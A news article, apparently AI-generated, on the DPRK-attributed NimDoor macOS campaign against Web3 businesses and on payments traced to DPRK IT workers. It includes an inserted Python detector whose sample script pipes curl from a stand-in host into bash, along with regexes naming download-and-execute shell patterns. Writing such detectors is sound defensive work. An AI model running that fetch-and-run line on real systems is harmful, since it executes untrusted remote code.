NimDoor Attack Targets macOS Devices via Web3 Businesses

Generated by AI agent, Coin World
Thursday, July 3, 2025, 8:02 pm ET · 1 min read

SentinelLabs, the research and threat intelligence arm of a prominent cybersecurity firm, has uncovered a sophisticated attack campaign called NimDoor, which targets macOS devices. This campaign is attributed to hackers from the Democratic People’s Republic of Korea (DPRK). The attack leverages the programming language Nim to inject multiple attack chains into devices used by small Web3 businesses, a trend that has recently gained traction.

The attack begins with a familiar social engineering tactic: impersonating a trusted contact to schedule a meeting via Calendly. The target then receives an email prompting them to update the Zoom application. The update script contains three lines of malicious code that retrieve and execute a second-stage script from an attacker-controlled server, disguised as a legitimate Zoom meeting link. Clicking the link automatically downloads two Mac binaries, which start two independent execution chains: the first scrapes general system information and application-specific data, while the second secures long-term access for the attacker.
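As an added illustration (not code from the article or from SentinelLabs), a small Python heuristic a defender could run over a suspicious "update" script to flag the download-and-execute pattern described above; the sample scripts and the update-host.invalid hostname are constructed for the example.

```python
import re
from typing import Dict, List

# Heuristics for the "fetch a second stage and run it" shape that the fake
# Zoom update script relies on. Each entry is a rule label and a compiled
# regex; a script line is flagged when any rule matches it.
DOWNLOAD_EXEC_PATTERNS = [
    ("curl_or_wget_piped_to_shell",
     re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(ba|z|k)?sh\b")),
    ("base64_decoded_then_executed",
     re.compile(r"base64\s+(-d|--decode)[^|]*\|\s*(sudo\s+)?(ba|z|k)?sh\b")),
    ("eval_of_remote_content",
     re.compile(r"\beval\b.*\$\((curl|wget)\b")),
]


def scan_update_script(script_text: str) -> List[Dict]:
    """Return one finding per suspicious non-comment line.

    Each finding is {"line": 1-based line number, "rule": label, "text": line}.
    The first matching rule wins, so a line is reported at most once.
    """
    findings = []
    for number, raw in enumerate(script_text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):  # skip blanks, comments, shebang
            continue
        for label, pattern in DOWNLOAD_EXEC_PATTERNS:
            if pattern.search(line):
                findings.append({"line": number, "rule": label, "text": line})
                break
    return findings


# Constructed sample: a few-line "updater" in the shape the article describes.
SAMPLE_UPDATE_SCRIPT = """#!/bin/bash
# Zoom SDK update
echo "Updating Zoom..."
curl -sL https://update-host.invalid/stage2.sh | bash
echo "Done"
"""

# Constructed sample: a version check with no remote fetch-and-run step.
BENIGN_SCRIPT = """#!/bin/bash
set -euo pipefail
version=$(cat /tmp/installed_version.txt)
echo "installed: $version"
"""

if __name__ == "__main__":
    for finding in scan_update_script(SAMPLE_UPDATE_SCRIPT):
        print(f"line {finding['line']}: {finding['rule']}: {finding['text']}")
```

The rules are deliberately narrow; a real triage pipeline would pair them with the download host's reputation and with what the fetched stage actually does.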

The attack chain continues with the installation of two Bash scripts via a Trojan. One script targets data from specific browsers, including Arc, Brave, Firefox, Chrome, and Edge. The other steals Telegram's encrypted data together with the blob used to decrypt it. The extracted data is then sent to an attacker-controlled server. The combination of multiple malware components and varied techniques makes this campaign unusual and hard for security analysts to detect.

Similar attacks have been detected by other cybersecurity firms in recent months. The use of multiple malware components and varied techniques makes it difficult for security analysts to detect and mitigate these threats.

ZachXBT, a pseudonymous blockchain investigator, has uncovered a chain of payments made to Korean IT workers, which could be linked to this group of hackers. ZachXBT's findings indicate that substantial payments have been made to various DPRK developers working on diverse projects since the beginning of the year. He has identified eight separate workers associated with 12 different companies. The payments, totaling $2.76 million in USDC per month, were sent from Circle accounts to addresses associated with the developers. These addresses are closely linked to one that was blacklisted by Tether in 2023, tied to alleged conspirator Sim Hyon Sop.

ZachXBT continues to monitor similar clusters of addresses but has not made any information public as they are still active. He has issued a warning that once these workers take ownership of contracts, the underlying project is at high risk. According to ZachXBT, hiring multiple DPRK IT workers is a significant indicator that the startup is likely to fail, primarily due to the team's own negligence rather than the sophistication of the threat.
